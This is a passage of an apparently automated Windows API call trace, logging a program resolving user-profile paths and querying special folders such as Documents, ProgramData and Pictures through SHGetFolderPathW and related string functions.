len=0x20 | out: pbstr=0x28f9d4*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0163.440] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\") returned 0x20 [0163.440] SetLastError (dwErrCode=0x0) [0163.440] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0163.440] GetLastError () returned 0x0 [0163.440] SysReAllocStringLen (in: pbstr=0x28fa14*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28fa14*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0163.440] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local", len=0x1f | out: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local") returned 1 [0163.440] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x28f524, lpFilePart=0x28f520 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local", lpFilePart=0x28f520*="Local") returned 0x1f [0163.440] SysReAllocStringLen (in: pbstr=0x28f764*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f764*="C:") returned 1 [0163.441] SysReAllocStringLen (in: pbstr=0x28f720*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f720*="C:\\") returned 1 [0163.441] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.441] SysReAllocStringLen (in: pbstr=0x28f71c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f71c*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0163.441] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\keecfm~1\\appdata\\") returned 0x1a [0163.441] SetLastError (dwErrCode=0x0) [0163.441] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0163.441] GetLastError () returned 0x0 [0163.446] SysReAllocStringLen (in: pbstr=0x28f75c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f75c*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0163.446] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\", psz="C:\\Users\\KEECFM~1\\AppData", len=0x19 | out: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData") returned 1 [0163.446] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData", nBufferLength=0x104, lpBuffer=0x28f26c, lpFilePart=0x28f268 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData", lpFilePart=0x28f268*="AppData") returned 0x19 [0163.446] SysReAllocStringLen (in: pbstr=0x28f4ac*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f4ac*="C:") returned 1 [0163.446] SysReAllocStringLen (in: pbstr=0x28f468*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f468*="C:\\") returned 1 [0163.447] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.447] SysReAllocStringLen (in: pbstr=0x28f464*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f464*="C:\\Users\\KEECFM~1\\") returned 1 [0163.447] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\", cchLength=0x12 | out: lpsz="c:\\users\\keecfm~1\\") returned 0x12 [0163.447] SetLastError (dwErrCode=0x0) [0163.447] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\", cchCount1=18, lpString2="c:\\", cchCount2=3) returned 3 [0163.447] GetLastError () returned 0x0 [0163.447] SysReAllocStringLen (in: pbstr=0x28f4a4*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f4a4*="C:\\Users\\KEECFM~1\\") returned 1 [0163.447] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\", psz="C:\\Users\\KEECFM~1", len=0x11 | out: pbstr=0x28f72c*="C:\\Users\\KEECFM~1") returned 1 [0163.447] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1", nBufferLength=0x104, lpBuffer=0x28efb4, lpFilePart=0x28efb0 | out: lpBuffer="C:\\Users\\KEECFM~1", lpFilePart=0x28efb0*="KEECFM~1") returned 0x11 [0163.447] SysReAllocStringLen (in: pbstr=0x28f1f4*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f1f4*="C:") returned 1 [0163.447] SysReAllocStringLen (in: pbstr=0x28f1b0*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f1b0*="C:\\") returned 1 [0163.448] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.448] SysReAllocStringLen (in: pbstr=0x28f1ac*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1ac*="C:\\Users\\") returned 1 [0163.448] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0163.448] SetLastError (dwErrCode=0x0) [0163.448] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0163.448] GetLastError () returned 0x0 [0163.448] SysReAllocStringLen (in: pbstr=0x28f1ec*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1ec*="C:\\Users\\") returned 1 [0163.448] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x28f474*="C:\\Users") returned 1 [0163.448] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x28ecfc, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users", lpFilePart=0x28ecf8*="Users") returned 0x8 [0163.448] SysReAllocStringLen (in: pbstr=0x28ef3c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ef3c*="C:") returned 1 [0163.449] SysReAllocStringLen (in: pbstr=0x28eef8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef8*="C:\\") returned 1 [0163.449] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.449] SysReAllocStringLen (in: pbstr=0x28eef4*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef4*="C:\\") returned 1 [0163.449] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.449] SetLastError (dwErrCode=0x0) [0163.449] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0163.449] GetLastError () returned 0x0 [0163.449] FileTimeToLocalFileTime (in: lpFileTime=0x28ef74, lpLocalFileTime=0x28eef0 | out: lpLocalFileTime=0x28eef0) returned 1 [0163.449] FileTimeToDosDateTime (in: lpFileTime=0x28eef0, lpFatDate=0x28ef42, lpFatTime=0x28ef40 | out: lpFatDate=0x28ef42, lpFatTime=0x28ef40) returned 1 [0163.450] FindClose (in: hFindFile=0x108c030 | out: hFindFile=0x108c030) returned 1 [0163.450] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x28f474*="C:\\Users") returned 1 [0163.450] SysReAllocStringLen (in: pbstr=0x28f1e4*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x28f1e4*="C:\\Users") returned 1 [0163.450] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f474*="C:\\Users\\") returned 1 [0163.450] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f26c, dwReserved1=0x32, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x108c030 [0163.451] FileTimeToLocalFileTime (in: lpFileTime=0x28f22c, lpLocalFileTime=0x28f1a8 | out: lpLocalFileTime=0x28f1a8) returned 1 [0163.451] FileTimeToDosDateTime (in: lpFileTime=0x28f1a8, lpFatDate=0x28f1fa, lpFatTime=0x28f1f8 | out: lpFatDate=0x28f1fa, lpFatTime=0x28f1f8) returned 1 [0163.451] FindClose (in: hFindFile=0x108c030 | out: hFindFile=0x108c030) returned 1 [0163.452] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1", psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj") returned 1 [0163.452] SysReAllocStringLen (in: pbstr=0x28f49c*=0x0, psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f49c*="C:\\Users\\kEecfMwgj") returned 1 [0163.452] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj", psz="C:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\") returned 1 [0163.452] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f524, dwReserved1=0x3e, cFileName="AppData", cAlternateFileName="")) returned 0x108c030 [0163.452] FileTimeToLocalFileTime (in: lpFileTime=0x28f4e4, lpLocalFileTime=0x28f460 | out: lpLocalFileTime=0x28f460) returned 1 [0163.452] FileTimeToDosDateTime (in: lpFileTime=0x28f460, lpFatDate=0x28f4b2, lpFatTime=0x28f4b0 | out: lpFatDate=0x28f4b2, lpFatTime=0x28f4b0) returned 1 [0163.453] FindClose (in: hFindFile=0x108c030 | out: hFindFile=0x108c030) returned 1 [0163.453] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0163.453] SysReAllocStringLen (in: pbstr=0x28f754*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f754*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0163.453] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0163.454] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f7dc, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0x108c030 [0163.454] FileTimeToLocalFileTime (in: lpFileTime=0x28f79c, lpLocalFileTime=0x28f718 | out: lpLocalFileTime=0x28f718) returned 1 [0163.454] FileTimeToDosDateTime (in: lpFileTime=0x28f718, lpFatDate=0x28f76a, lpFatTime=0x28f768 | out: lpFatDate=0x28f76a, lpFatTime=0x28f768) returned 1 [0163.454] FindClose (in: hFindFile=0x108c030 | out: hFindFile=0x108c030) returned 1 [0163.455] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0163.455] SysReAllocStringLen (in: pbstr=0x28fa0c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fa0c*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0163.455] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0163.455] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x108c030 [0163.455] FileTimeToLocalFileTime (in: lpFileTime=0x28fa54, lpLocalFileTime=0x28f9d0 | out: lpLocalFileTime=0x28f9d0) returned 1 [0163.455] FileTimeToDosDateTime (in: lpFileTime=0x28f9d0, lpFatDate=0x28fa22, lpFatTime=0x28fa20 | out: lpFatDate=0x28fa22, lpFatTime=0x28fa20) returned 1 [0163.456] FindClose (in: hFindFile=0x108c030 | out: hFindFile=0x108c030) returned 1 [0163.456] SysReAllocStringLen (in: pbstr=0x28fcdc*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fcdc*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0163.456] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fda0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0163.456] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0163.456] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", cchLength=0x26 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 0x26 [0163.456] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fda0*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0163.477] SysReAllocStringLen (in: pbstr=0x2ad25bc*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x2ad25bc*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0163.477] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2ae1c98 | out: pszPath="C:\\Users\\kEecfMwgj\\Documents") returned 0x0 [0163.485] SysReAllocStringLen (in: pbstr=0x28fd90*=0x0, psz="C:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fd90*="C:\\Users\\kEecfMwgj\\Documents") returned 1 [0163.485] SysReAllocStringLen (in: pbstr=0x28fd94*=0x0, psz="C:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0163.486] GetThreadLocale () returned 0x409 [0163.486] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.486] GetThreadLocale () returned 0x409 [0163.486] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.486] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\", lpFilePart=0x28fa90*=0x0) returned 0x1d [0163.486] SysReAllocStringLen (in: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\", psz="C:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0163.486] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0163.486] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Documents\\", cchLength=0x1d | out: lpsz="c:\\users\\keecfmwgj\\documents\\") returned 0x1d [0163.486] SysReAllocStringLen (in: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\", psz="c:\\users\\keecfmwgj\\documents\\", len=0x1d | out: pbstr=0x28fd94*="c:\\users\\keecfmwgj\\documents\\") returned 1 [0163.487] SysReAllocStringLen (in: pbstr=0x2ad25ac*=0x0, psz="c:\\users\\keecfmwgj\\documents\\", len=0x1d | out: pbstr=0x2ad25ac*="c:\\users\\keecfmwgj\\documents\\") returned 1 [0163.487] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0x2ae1c98 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0163.492] SysReAllocStringLen (in: pbstr=0x28fd84*=0x0, psz="C:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fd84*="C:\\Users\\Public\\Documents") returned 1 [0163.493] SysReAllocStringLen (in: pbstr=0x28fd88*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\") returned 1 [0163.493] GetThreadLocale () returned 0x409 [0163.493] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.493] GetThreadLocale () returned 0x409 [0163.493] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.493] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\Public\\Documents\\", lpFilePart=0x28fa90*=0x0) returned 0x1a [0163.493] SysReAllocStringLen (in: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\", psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\") returned 1 [0163.493] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fcc0*="C:\\Users\\Public\\Documents\\") returned 1 [0163.494] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents\\", cchLength=0x1a | out: lpsz="c:\\users\\public\\documents\\") returned 0x1a [0163.494] SysReAllocStringLen (in: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\", psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0x28fd88*="c:\\users\\public\\documents\\") returned 1 [0163.494] SysReAllocStringLen (in: pbstr=0x2ad25c0*=0x0, psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0x2ad25c0*="c:\\users\\public\\documents\\") returned 1 [0163.494] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x2ae1c98 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0163.497] SysReAllocStringLen (in: pbstr=0x28fd78*=0x0, psz="C:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fd78*="C:\\Program Files (x86)") returned 1 [0163.498] SysReAllocStringLen (in: pbstr=0x28fd7c*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fd7c*="C:\\Program Files (x86)\\") returned 1 [0163.498] GetThreadLocale () returned 0x409 [0163.498] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.498] GetThreadLocale () returned 0x409 [0163.498] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.498] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Program Files (x86)\\", lpFilePart=0x28fa90*=0x0) returned 0x17 [0163.498] SysReAllocStringLen (in: pbstr=0x28fd7c*="C:\\Program Files (x86)\\", psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fd7c*="C:\\Program Files (x86)\\") returned 1 [0163.498] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fcc0*="C:\\Program Files (x86)\\") returned 1 [0163.499] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\", cchLength=0x17 | out: lpsz="c:\\program files (x86)\\") returned 0x17 [0163.499] SysReAllocStringLen (in: pbstr=0x28fd7c*="C:\\Program Files (x86)\\", psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0x28fd7c*="c:\\program files (x86)\\") returned 1 [0163.499] SysReAllocStringLen (in: pbstr=0x2ad25c4*=0x0, psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0x2ad25c4*="c:\\program files (x86)\\") returned 1 [0163.499] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x2ae1c98 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.518] SysReAllocStringLen (in: pbstr=0x28fd6c*=0x0, psz="C:\\ProgramData", len=0xe | out: pbstr=0x28fd6c*="C:\\ProgramData") returned 1 [0163.518] SysReAllocStringLen (in: pbstr=0x28fd70*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x28fd70*="C:\\ProgramData\\") returned 1 [0163.518] GetThreadLocale () returned 0x409 [0163.518] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.518] GetThreadLocale () returned 0x409 [0163.518] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.518] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\ProgramData\\", lpFilePart=0x28fa90*=0x0) returned 0xf [0163.519] SysReAllocStringLen (in: pbstr=0x28fd70*="C:\\ProgramData\\", psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x28fd70*="C:\\ProgramData\\") returned 1 [0163.519] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x28fcc0*="C:\\ProgramData\\") returned 1 [0163.519] CharLowerBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="c:\\programdata\\") returned 0xf [0163.519] SysReAllocStringLen (in: pbstr=0x28fd70*="C:\\ProgramData\\", psz="c:\\programdata\\", len=0xf | out: pbstr=0x28fd70*="c:\\programdata\\") returned 1 [0163.522] SysReAllocStringLen (in: pbstr=0x2ad25c8*=0x0, psz="c:\\programdata\\", len=0xf | out: pbstr=0x2ad25c8*="c:\\programdata\\") returned 1 [0163.522] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0x2ae1c98 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0163.524] SysReAllocStringLen (in: pbstr=0x28fd60*=0x0, psz="C:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fd60*="C:\\Program Files (x86)\\Common Files") returned 1 [0163.524] SysReAllocStringLen (in: pbstr=0x28fd64*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0163.524] GetThreadLocale () returned 0x409 [0163.524] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.524] GetThreadLocale () returned 0x409 [0163.524] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.524] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\", lpFilePart=0x28fa90*=0x0) returned 0x24 [0163.524] SysReAllocStringLen (in: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\", psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0163.524] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fcc0*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0163.525] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\Common Files\\", cchLength=0x24 | out: lpsz="c:\\program files (x86)\\common files\\") returned 0x24 [0163.525] SysReAllocStringLen (in: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\", psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0x28fd64*="c:\\program files (x86)\\common files\\") returned 1 [0163.525] SysReAllocStringLen (in: pbstr=0x2ad25cc*=0x0, psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0x2ad25cc*="c:\\program files (x86)\\common files\\") returned 1 [0163.525] SHGetFolderPathW (in: hwnd=0x0, csidl=39, hToken=0x0, dwFlags=0x0, pszPath=0x2ae1c98 | out: pszPath="C:\\Users\\kEecfMwgj\\Pictures") returned 0x0 [0163.528] SysReAllocStringLen (in: pbstr=0x28fd54*=0x0, psz="C:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fd54*="C:\\Users\\kEecfMwgj\\Pictures") returned 1 [0163.528] SysReAllocStringLen (in: pbstr=0x28fd58*=0x0, psz="C:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0163.528] GetThreadLocale () returned 0x409 [0163.528] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Pictures\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.528] GetThreadLocale () returned 0x409 [0163.528] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Pictures\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.529] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\", lpFilePart=0x28fa90*=0x0) returned 0x1c [0163.529] SysReAllocStringLen 